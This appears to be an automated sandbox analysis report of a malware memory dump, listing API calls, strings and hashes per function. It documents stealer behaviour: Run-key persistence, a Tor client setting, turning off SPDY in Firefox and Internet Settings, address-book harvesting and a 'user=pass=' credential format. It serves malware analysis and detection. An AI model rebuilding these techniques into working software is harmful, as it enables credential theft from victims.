Part of subcall function 00B2B8FB: RtlLeaveCriticalSection.NTDLL(00B3E268), ref: 00B2B918
Part of subcall function 00B2B8FB: InterlockedIncrement.KERNEL32(0000001C), ref: 00B2B931

RtlAllocateHeap.NTDLL(00000000,00000018,Blocked), ref: 00B2078E
memset.NTDLL ref: 00B2079F
lstrcmpi.KERNEL32(?,?), ref: 00B207DF
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00B20808
memcpy.NTDLL(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00B1B24E), ref: 00B2081C
memset.NTDLL ref: 00B20829
memcpy.NTDLL(-00000004,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00B20842
memcpy.NTDLL(-00000005,HIDDEN,00000007,-00000004,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00B2085D
HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00B1B24E), ref: 00B2087A

Strings

Blocked, xrefs: 00B20761, 00B2088A
HIDDEN, xrefs: 00B20857

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Heapmemcpy$AllocateCriticalSectionmemset$EnterFreeIncrementInterlockedLeavelstrcmpi
String ID: Blocked$HIDDEN
API String ID: 694413484-4010945860
Opcode ID: 33f47e3321867cf6a588b3fd99b9b1bb82a1a920372d204247b90fd9c8cebdad
Instruction ID: 2428cfd1f0c98a59a331bf4864968e2521f30e0d2981ffd9b06089b775e5c92e
Opcode Fuzzy Hash: 33f47e3321867cf6a588b3fd99b9b1bb82a1a920372d204247b90fd9c8cebdad
Instruction Fuzzy Hash: F241B431D10219AFCB10AFA4EC85B9E7BF5FF04310F1044A5F518A7262DB30AE459B50

Uniqueness

Uniqueness Score: -1.00%

Function 00B34CD0, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 101registrymemorystringCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 00B34CEC

Part of subcall function 00B2E55A: RegCloseKey.ADVAPI32(?,?,?,00B34D11,00000000,00000000,00000000,00000000), ref: 00B2E5E1

lstrcmpiW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B34D24
lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00B34D35
RegCreateKeyA.ADVAPI32(80000001,54464F53,?), ref: 00B34D70
RegCloseKey.ADVAPI32(?), ref: 00B34D9B
RtlEnterCriticalSection.NTDLL(00000000), ref: 00B34DB1
HeapFree.KERNEL32(00000000,?), ref: 00B34DC6
RtlLeaveCriticalSection.NTDLL(00000000), ref: 00B34DD6
HeapFree.KERNEL32(00000000,?), ref: 00B34DEB
RegCloseKey.ADVAPI32(?), ref: 00B34DF0

Strings

Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00B34CDC

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Close$CriticalFreeHeapSection$CreateEnterLeaveOpenlstrcmpilstrlen
String ID: Software\Microsoft\Windows\CurrentVersion\Run
API String ID: 4138089493-1428018034
Opcode ID: 9ec04aafde94997be9ead8d1595a3eb053d653f804260c7cb90b882321bdd2fc
Instruction ID: 327d5f455f2537bc406a202737f078e65e63e7ddd484dd0b1379eccf6334697e
Opcode Fuzzy Hash: 9ec04aafde94997be9ead8d1595a3eb053d653f804260c7cb90b882321bdd2fc
Instruction Fuzzy Hash: 7531F875900109FFDB119F95EC88DAEBBBAFB44704F2140A6F505E7060EB319E59DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B2EBD0, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 76stringfilememoryCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00B2EBE0
CreateFileW.KERNEL32(00B30C37,80000000,00000003,00B3E0D4,00000003,00000000,00000000,?,00B30C37,00000000,00000000,00B145A1,00000000), ref: 00B2EBFD
GetLastError.KERNEL32(?,00B30C37,00000000,00000000,00B145A1,00000000), ref: 00B2EC9E

Part of subcall function 00B26AB9: lstrlen.KERNEL32(?,00000000,00B2EC1E,00000027,00B3E0D4,?,00000000,?,?,00B2EC1E,Local\,00000001,?,00B30C37,00000000,00000000), ref: 00B26AEF
Part of subcall function 00B26AB9: lstrcpy.KERNEL32(00000000,00000000), ref: 00B26B13
Part of subcall function 00B26AB9: lstrcat.KERNEL32(00000000,00000000), ref: 00B26B1B

GetFileSize.KERNEL32(00B30C37,00000000,Local\,00000001,?,00B30C37,00000000,00000000,00B145A1,00000000), ref: 00B2EC29
CreateFileMappingA.KERNEL32(00B30C37,00B3E0D4,00000002,00000000,00000000,00B30C37), ref: 00B2EC3D
lstrlen.KERNEL32(00B30C37,?,00B30C37,00000000,00000000,00B145A1,00000000), ref: 00B2EC59
lstrcpy.KERNEL32(?,00B30C37), ref: 00B2EC69
GetLastError.KERNEL32(?,00B30C37,00000000,00000000,00B145A1,00000000), ref: 00B2EC71
HeapFree.KERNEL32(00000000,00B30C37,?,00B30C37,00000000,00000000,00B145A1,00000000), ref: 00B2EC84
CloseHandle.KERNEL32(00B30C37,Local\,00000001,?,00B30C37), ref: 00B2EC96

Strings

Local\, xrefs: 00B2EC11

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: File$CreateErrorLastlstrcpylstrlen$CloseCountFreeHandleHeapMappingSizeTicklstrcat
String ID: Local\
API String ID: 194907169-422136742
Opcode ID: d242f9c688be0a911adb759596f0fcc8f23365a69b588127c9bd7f0d9235bcd8
Instruction ID: 827a5c63859d2b1d7c481dd6cb90d52d396d88f2ae1bce98ae3017df5487fcba
Opcode Fuzzy Hash: d242f9c688be0a911adb759596f0fcc8f23365a69b588127c9bd7f0d9235bcd8
Instruction Fuzzy Hash: 1521F670900308FFDB159FA5ED88A9EBFB9EB04350F208469F519E7260DB748A44DF61

Uniqueness

Uniqueness Score: -1.00%

Function 00B343D8, Relevance: 18.2, APIs: 12, Instructions: 179synchronizationstringthreadCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B343FF
memcpy.NTDLL(?,?,00000010), ref: 00B34422
memset.NTDLL ref: 00B3446E
lstrcpyn.KERNEL32(?,?,00000034), ref: 00B34482
GetLastError.KERNEL32 ref: 00B344B0
GetLastError.KERNEL32 ref: 00B344F3
GetLastError.KERNEL32 ref: 00B34512
WaitForSingleObject.KERNEL32(?,000927C0), ref: 00B3454C
WaitForSingleObject.KERNEL32(?,00000000), ref: 00B3455A
GetLastError.KERNEL32 ref: 00B345CF
ReleaseMutex.KERNEL32(?), ref: 00B345E1
RtlExitUserThread.NTDLL(?), ref: 00B345F7

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: ErrorLast$ObjectSingleWait$ExitMutexReleaseThreadUserlstrcpynmemcpymemset
String ID:
API String ID: 4037736292-0
Opcode ID: 195bddebe8c68ccddfc89d7836d3ccb85e56add01e85b3fbdd6c3aa2cf750ac8
Instruction ID: 5f1f9bdfafb862ff1a396f16e737d173eb641f9224516c254403edda1ef4822a
Opcode Fuzzy Hash: 195bddebe8c68ccddfc89d7836d3ccb85e56add01e85b3fbdd6c3aa2cf750ac8
Instruction Fuzzy Hash: 34616C71904300AFC7219F259C48A2BBBE9FF94710F218A6DF59AD3290EB74E944CF52

Uniqueness

Uniqueness Score: -1.00%

Function 00B15A92, Relevance: 18.1, APIs: 12, Instructions: 104synchronizationpipethreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B15AC4
WaitForSingleObject.KERNEL32(000003C4,00000000), ref: 00B15AE6
ConnectNamedPipe.KERNEL32(?,?), ref: 00B15B06
GetLastError.KERNEL32 ref: 00B15B10
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00B15B34
FlushFileBuffers.KERNEL32(?,?,00000001,00000000,?,?,?,00000010,00000000), ref: 00B15B77
DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 00B15B80
WaitForSingleObject.KERNEL32(00000000), ref: 00B15B89
CloseHandle.KERNEL32(?), ref: 00B15B9E
GetLastError.KERNEL32 ref: 00B15BAB
CloseHandle.KERNEL32(?), ref: 00B15BB8
RtlExitUserThread.NTDLL(000000FF), ref: 00B15BCE

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Wait$CloseErrorHandleLastNamedObjectPipeSingle$BuffersConnectCreateDisconnectEventExitFileFlushMultipleObjectsThreadUser
String ID:
API String ID: 4053378866-0
Opcode ID: 1163dfb5d9bac90abc2039ea272f276585172e66fc63bc797f1619d41e443872
Instruction ID: b7bdba053994cd9da8fc250c04c8cd64f6f9aa8c8f9b50037db99ff8fdf312dd
Opcode Fuzzy Hash: 1163dfb5d9bac90abc2039ea272f276585172e66fc63bc797f1619d41e443872
Instruction Fuzzy Hash: 08316170408705EFD7219F24DC8589FBBEAFB84354F600A29F569D21A0DF70DE898A53

Uniqueness

Uniqueness Score: -1.00%

Function 00B11C76, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 164memorythreadsleepCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 00B11CAF
memset.NTDLL ref: 00B11CC3

Part of subcall function 00B2672D: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,00B11CDF,00000000,00000000,?,?,00000000,?,?,?,00B11CDF,TorClient), ref: 00B26765
Part of subcall function 00B2672D: RtlAllocateHeap.NTDLL(00000000,00B11CDF), ref: 00B26779
Part of subcall function 00B2672D: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,00B11CDF,?,?,?,00B11CDF,TorClient,?,?), ref: 00B26793
Part of subcall function 00B2672D: RegCloseKey.KERNELBASE(?,?,?,?,00B11CDF,TorClient,?,?), ref: 00B267BD

GetCurrentThreadId.KERNEL32 ref: 00B11D52
GetCurrentThread.KERNEL32 ref: 00B11D65
RtlEnterCriticalSection.NTDLL(05778D20), ref: 00B11E0C
Sleep.KERNEL32(0000000A), ref: 00B11E16
RtlLeaveCriticalSection.NTDLL(05778D20), ref: 00B11E3C
HeapFree.KERNEL32(00000000,?), ref: 00B11E6A
HeapFree.KERNEL32(00000000,00000018), ref: 00B11E7D

Strings

TorClient, xrefs: 00B11CD5

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateCriticalCurrentFreeQuerySectionThreadValue$CloseEnterLeaveSleepmemset
String ID: TorClient
API String ID: 1146182784-3399603969
Opcode ID: 5f7a71fb2c0aea2b84d5c1f4e8a515e76ea41391459652e13d79b319cc434827
Instruction ID: f6f4f6f2efcc2ad2a8079b660c2a8d9972ee2fadc3c9eadda776a4f806f5a919
Opcode Fuzzy Hash: 5f7a71fb2c0aea2b84d5c1f4e8a515e76ea41391459652e13d79b319cc434827
Instruction Fuzzy Hash: F95118B5504305AFD710DF68E88099BBBE9FB88344F90096EFA95D7261DB30DD48CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00B2A098, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 116registrysynchronizationthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00B2888D: lstrlenW.KERNEL32(?,00000000,%APPDATA%\Mozilla\Firefox\Profiles,?,00000250,?,00000000), ref: 00B288D9
Part of subcall function 00B2888D: lstrlenW.KERNEL32(?,?,00000000), ref: 00B288E5
Part of subcall function 00B2888D: memset.NTDLL ref: 00B2892D
Part of subcall function 00B2888D: FindFirstFileW.KERNEL32(00000000,00000000), ref: 00B28948
Part of subcall function 00B2888D: lstrlenW.KERNEL32(0000002C), ref: 00B28980
Part of subcall function 00B2888D: lstrlenW.KERNEL32(?), ref: 00B28988
Part of subcall function 00B2888D: memset.NTDLL ref: 00B289AB
Part of subcall function 00B2888D: wcscpy.NTDLL ref: 00B289BD

WaitForSingleObject.KERNEL32(00000000,%APPDATA%\Mozilla\Firefox\Profiles,prefs.js,?,00000000,00000000,00000001), ref: 00B2A12B
RegOpenKeyA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings,?), ref: 00B2A15A
RegCloseKey.ADVAPI32(?), ref: 00B2A17F
WaitForSingleObject.KERNEL32(00000000), ref: 00B2A1C2
RtlExitUserThread.NTDLL(?), ref: 00B2A1F8

Part of subcall function 00B17365: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,73B75520,?,?,00B21386,00000000,?,?), ref: 00B17383
Part of subcall function 00B17365: GetFileSize.KERNEL32(00000000,00000000,?,?,00B21386,00000000,?,?,?,?,00000000,00B11589,?,00000000,?,00B25B4A), ref: 00B17393
Part of subcall function 00B17365: CloseHandle.KERNEL32(000000FF,?,?,00B21386,00000000,?,?,?,?,00000000,00B11589,?,00000000,?,00B25B4A,?), ref: 00B173F5

Part of subcall function 00B24241: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,00000000,00B21ED8), ref: 00B24282
Part of subcall function 00B24241: GetLastError.KERNEL32 ref: 00B2428C
Part of subcall function 00B24241: WaitForSingleObject.KERNEL32(000000C8), ref: 00B242B1
Part of subcall function 00B24241: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 00B242D2
Part of subcall function 00B24241: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 00B242FA
Part of subcall function 00B24241: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 00B2430F
Part of subcall function 00B24241: SetEndOfFile.KERNEL32(00000006), ref: 00B2431C
Part of subcall function 00B24241: CloseHandle.KERNEL32(00000006), ref: 00B24334

Strings

prefs.js, xrefs: 00B2A0B0
%APPDATA%\Mozilla\Firefox\Profiles, xrefs: 00B2A0B5
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 00B2A150
EnableSPDY3_0, xrefs: 00B2A16E
user_pref("network.http.spdy.enabled", false);, xrefs: 00B2A0E3, 00B2A0F9

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: File$lstrlen$CloseCreateObjectSingleWait$Handlememset$ErrorExitFindFirstLastOpenPointerSizeThreadUserWritewcscpy
String ID: user_pref("network.http.spdy.enabled", false);$%APPDATA%\Mozilla\Firefox\Profiles$EnableSPDY3_0$SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings$prefs.js
API String ID: 796380773-3405794569
Opcode ID: e9539ab5c1c73b7d28d11a8cc027608a791e4e827d43a4ed96aaa8eda6dd729a
Instruction ID: 7d2a76d10f032de432c69c642876f69f1dd933e35ae9948738983a2f1cb82567
Opcode Fuzzy Hash: e9539ab5c1c73b7d28d11a8cc027608a791e4e827d43a4ed96aaa8eda6dd729a
Instruction Fuzzy Hash: 61418671E40215BFDB14DBA4EC46FAEBBF9EB04710F2000A5F518B71A1DB709A41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00B2F83B, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 114registrymemoryCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL ref: 00B2F853
RtlEnterCriticalSection.NTDLL(00000000), ref: 00B2F894
RegOpenKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 00B2F8A8
CloseHandle.KERNEL32(?,?,?,00000000), ref: 00B2F8FD
HeapFree.KERNEL32(00000000,?,?,00000000,00000000), ref: 00B2F947
RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00B2F955
RtlLeaveCriticalSection.NTDLL(00000000), ref: 00B2F960

Part of subcall function 00B13F5D: RegCreateKeyA.ADVAPI32(80000001,00000057,00B120D2), ref: 00B13F71
Part of subcall function 00B13F5D: memcpy.NTDLL(00000000,?,00B120D2,00B120D2,-00000005,?,00B1488A,Scr,00000000,-00000005,00000001,?,?,?,00B16516,00000000), ref: 00B13F9A
Part of subcall function 00B13F5D: RegCloseKey.ADVAPI32(00B120D2,?,00B1488A,Scr,00000000,-00000005,00000001,?,?,?,00B16516,00000000,Scr,?,?,73BCF710), ref: 00B13FEE

Strings

Client32, xrefs: 00B2F864
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00B2F89E
rundll32, xrefs: 00B2F906, 00B2F90B

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Close$CriticalSection$CreateEnterFreeHandleHeaderHeapImageLeaveOpenmemcpy
String ID: Client32$Software\Microsoft\Windows\CurrentVersion\Run$rundll32
API String ID: 2070110485-668865654
Opcode ID: d2773ceab3cb5d13d401a2e3a9bef02b61d3f6271376c092380e635489dde93d
Instruction ID: b36a15aba90d6fdc28065ec82716d612945c8559973e3f872501220777e35d2c
Opcode Fuzzy Hash: d2773ceab3cb5d13d401a2e3a9bef02b61d3f6271376c092380e635489dde93d
Instruction Fuzzy Hash: EF318071A10226FBDB215F64EC85B7EB7F9EB44B40F2400B5F509A71A0DB70CD81DA50

Uniqueness

Uniqueness Score: -1.00%

Function 00B147A0, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110memorystringCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,0000002C,7656D3B0,00000000,?,?,?,?,00B16516,00000000,Scr,?,?,73BCF710,00000000,00000000), ref: 00B147C5
StrChrA.SHLWAPI(00000001,0000002C,?,?,?,00B16516,00000000,Scr,?,?,73BCF710,00000000,00000000,?,?,00B358C6), ref: 00B147D8
StrTrimA.SHLWAPI(?,20000920,?,?,?,00B16516,00000000,Scr,?,?,73BCF710,00000000,00000000,?,?,00B358C6), ref: 00B147FB
StrTrimA.SHLWAPI(00000001,20000920,?,?,?,00B16516,00000000,Scr,?,?,73BCF710,00000000,00000000,?,?,00B358C6), ref: 00B1480A
lstrlen.KERNEL32(?,?,?,?,00B16516,00000000,Scr,?,?,73BCF710,00000000,00000000,?,?,00B358C6,?), ref: 00B1483F
RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 00B14852
lstrcpy.KERNEL32(00000004,?), ref: 00B14870
HeapFree.KERNEL32(00000000,00000000,Scr,00000000,-00000005,00000001,?,?,?,00B16516,00000000,Scr,?,?,73BCF710,00000000), ref: 00B14896

Strings

Scr, xrefs: 00B1487A, 00B148CC
W, xrefs: 00B147AF

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: HeapTrim$AllocateFreelstrcpylstrlen
String ID: Scr$W
API String ID: 1974185407-3281027876
Opcode ID: 42bf7c8edf5d9178e45cfa7b96790c2df79b86221ad0779f273ffb91c7c82e5f
Instruction ID: 7f94d830904fa96532975a46eff33782aa5c129b14fc23e0938d329273ea33a0
Opcode Fuzzy Hash: 42bf7c8edf5d9178e45cfa7b96790c2df79b86221ad0779f273ffb91c7c82e5f
Instruction Fuzzy Hash: 1031BE35900248FEDB109BA4DC84EEE7FF8EF05750F6040A6F80AE7260DB709984DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B21F6E, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 103memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B206E2: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00B20714
Part of subcall function 00B206E2: HeapFree.KERNEL32(00000000,00000000,?,?,00B21F8A,?,00000022,00000000,00000000,00000000,?,?), ref: 00B20739

Part of subcall function 00B24151: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00B21FAB,?,?,?,?,?,00000022,00000000,00000000), ref: 00B2418B
Part of subcall function 00B24151: HeapFree.KERNEL32(00000000,00000000,00000000,00000001,?,00B21FAB,?,?,?,?,?,00000022,00000000,00000000,00000000,?), ref: 00B241D7

lstrlen.KERNEL32(00000000,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 00B21FE0
lstrlen.KERNEL32(?,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 00B21FE8
lstrlen.KERNEL32(?), ref: 00B21FF2
RtlAllocateHeap.NTDLL(00000000,?), ref: 00B22007
wsprintfA.USER32 ref: 00B2203C
HeapFree.KERNEL32(00000000,00000000,0000011E,00000000,00000000,00000000), ref: 00B2205E
HeapFree.KERNEL32(00000000,?), ref: 00B22073
HeapFree.KERNEL32(00000000,?), ref: 00B22080
HeapFree.KERNEL32(00000000,00000000,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 00B2208E

Strings

URL: %suser=%spass=%s, xrefs: 00B22036

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$lstrlen$Allocate$wsprintf
String ID: URL: %suser=%spass=%s
API String ID: 168057987-1589266237
Opcode ID: 56ad6fa0a254446941eae03e4022b01fbfe84d3c9f41281e28e30d54e2cff946
Instruction ID: 4bdbe6e9805417325bfe72e0dfdd995f14f1a629a3909fcf993c0b901ff90d1b
Opcode Fuzzy Hash: 56ad6fa0a254446941eae03e4022b01fbfe84d3c9f41281e28e30d54e2cff946
Instruction Fuzzy Hash: 5431A131604325BFCB21AF64AC45E5FBBE9FF88710F10096AF548E21A2DB70C815CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00B29695, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72filetimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,00B22509,?,?,00000000), ref: 00B296A1
_aulldiv.NTDLL(?,00000000,54D38000,00000192), ref: 00B296B7
_snwprintf.NTDLL ref: 00B296DC
CreateFileMappingW.KERNEL32(000000FF,00B3E0D4,00000004,00000000,00001000,?,?,?,00000000,54D38000,00000192), ref: 00B296F8
GetLastError.KERNEL32(?,?,00000000,54D38000,00000192,?,?,?,?,?,?,?,?,?,00B22509,?), ref: 00B2970A
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,00000000,54D38000,00000192), ref: 00B29721
CloseHandle.KERNEL32(00000000,?,?,00000000,54D38000,00000192,?,?,?,?,?,?,?,?,?,00B22509), ref: 00B29742
GetLastError.KERNEL32(?,?,00000000,54D38000,00000192,?,?,?,?,?,?,?,?,?,00B22509,?), ref: 00B2974A

Strings

Local\, xrefs: 00B296CB

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID: Local\
API String ID: 1814172918-422136742
Opcode ID: e2c7dc9d562bd6cd18802e42398bf3320811f70759fdccf519417fb0bb7a1b1e
Instruction ID: 50aaff0ebf6eb1cb35fd2fffb2cd37e94b9c65ea00c9c6ae6b346fcb66f8b08f
Opcode Fuzzy Hash: e2c7dc9d562bd6cd18802e42398bf3320811f70759fdccf519417fb0bb7a1b1e
Instruction Fuzzy Hash: 6F21C072640214BBD715AF64DC85F9E77E9AB44710F3140A1FA1DE71E0DF70AA098B51

Uniqueness

Uniqueness Score: -1.00%

Function 00B18334, Relevance: 16.6, APIs: 11, Instructions: 144memoryregistryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000104,73B75520), ref: 00B1836A
RtlAllocateHeap.NTDLL(00000000,00000104), ref: 00B1837F
RegCreateKeyA.ADVAPI32(80000001,?), ref: 00B183A7
HeapFree.KERNEL32(00000000,?), ref: 00B183E8
HeapFree.KERNEL32(00000000,00000000), ref: 00B183F8
RtlAllocateHeap.NTDLL(00000000,00B2AEC6), ref: 00B1840B
RtlAllocateHeap.NTDLL(00000000,00B2AEC6), ref: 00B1841A
HeapFree.KERNEL32(00000000,00000000,?,00B2AEC6,00000000,?,?,?), ref: 00B18464
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00B2AEC6,00000000,?,?,?), ref: 00B18488
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00B2AEC6,00000000,?,?), ref: 00B184AD
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00B2AEC6,00000000,?,?), ref: 00B184C2

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$Allocate$CloseCreate
String ID:
API String ID: 4126010716-0
Opcode ID: 4853cb5213a280ee35b9766acee093ae65a6ad69f338f23eaee03da14ceaa8c5
Instruction ID: f7d47a492ea217a6494d9b8574e99c24004db23d60aec18a6708069bce613379
Opcode Fuzzy Hash: 4853cb5213a280ee35b9766acee093ae65a6ad69f338f23eaee03da14ceaa8c5
Instruction Fuzzy Hash: 3051A3B5C0021EEFDF119F94ED849EEBBB9FB08345B60406AF515A2260DB319E94DF60

Uniqueness

Uniqueness Score: -1.00%

Function 00B327DB, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00B30745,00000000), ref: 00B327F5
RtlAllocateHeap.NTDLL(00000000,00000024), ref: 00B3280A
memset.NTDLL ref: 00B32817
HeapFree.KERNEL32(00000000,00000000,?,00B30744,?,?,00000000,?,00000000,00B2279E,?,00000000), ref: 00B32834
memcpy.NTDLL(?,?,00B30744,?,00B30744,?,?,00000000,?,00000000,00B2279E,?,00000000), ref: 00B32855

Strings

chun, xrefs: 00B328C3
Referer: , xrefs: 00B328D3
Content-Length:, xrefs: 00B32885
Transfer-Encoding:, xrefs: 00B328B2

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Heap$Allocate$Freememcpymemset
String ID: Content-Length:$Referer: $Transfer-Encoding:$chun
API String ID: 2362494589-2246273904
Opcode ID: c49fa8617d8aca2be335c17b6cc47ba9d06bcbe9baf81e7011060c4b572d907c
Instruction ID: 9b29ab158f93c31134f85fa4555d0936b544a2de418838e766db2e369328940d
Opcode Fuzzy Hash: c49fa8617d8aca2be335c17b6cc47ba9d06bcbe9baf81e7011060c4b572d907c
Instruction Fuzzy Hash: C131BE31A00715AFD7309F6ADC40B66BBE9EF24710F20446AF94A97270DB70E945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B2FC77, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 85registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,00000001), ref: 00B2FC92
RegCloseKey.ADVAPI32(00000001,?,00000008,?,00000001), ref: 00B2FD43

Part of subcall function 00B3247D: RtlAllocateHeap.NTDLL(00000000,00000200,00B26D11), ref: 00B32489

LoadLibraryA.KERNEL32(00000000,?,00000008,?,00000001), ref: 00B2FCE0
GetProcAddress.KERNEL32(00000000,WABOpen), ref: 00B2FCF2
GetLastError.KERNEL32(?,00000008,?,00000001), ref: 00B2FD11
FreeLibrary.KERNEL32(00000000,?,00000008,?,00000001), ref: 00B2FD23
GetLastError.KERNEL32(?,00000008,?,00000001), ref: 00B2FD2B

Strings

WABOpen, xrefs: 00B2FCEC
Software\Microsoft\WAB\DLLPath, xrefs: 00B2FC83

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: ErrorLastLibrary$AddressAllocateCloseFreeHeapLoadOpenProc
String ID: Software\Microsoft\WAB\DLLPath$WABOpen
API String ID: 1628847533-1249168598
Opcode ID: 71b5a663d3a3016a92a5db438c211cadfa056c5b8b78ed6ff1fe3677912c144d
Instruction ID: b2c03c2de7973f7225ead86a448858d765664e65bbfd26b0a9f77a402694e398
Opcode Fuzzy Hash: 71b5a663d3a3016a92a5db438c211cadfa056c5b8b78ed6ff1fe3677912c144d
Instruction Fuzzy Hash: 4921B671900229BFDB116BA4BC88CBEBBF8EB84790B2005F5F90AA3121DB704D45DF51

Uniqueness

Uniqueness Score: -1.00%

Function 00B17EAA, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,00000020), ref: 00B17EC2
StrChrA.SHLWAPI(00000001,00000020), ref: 00B17ED3

Part of subcall function 00B1686F: lstrlen.KERNEL32(?,?,00000000,00000000,?,00B25C96,00000000,Referer: ,?,00000000,00000001), ref: 00B16881
Part of subcall function 00B1686F: StrChrA.SHLWAPI(?,0000000D,?,00B25C96,00000000,Referer: ,?,00000000,00000001), ref: 00B168B9

RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00B17F0C
memcpy.NTDLL(00000000,http://,00000007), ref: 00B17F32
memcpy.NTDLL(00000000,?,?,00000000,http://,00000007), ref: 00B17F41
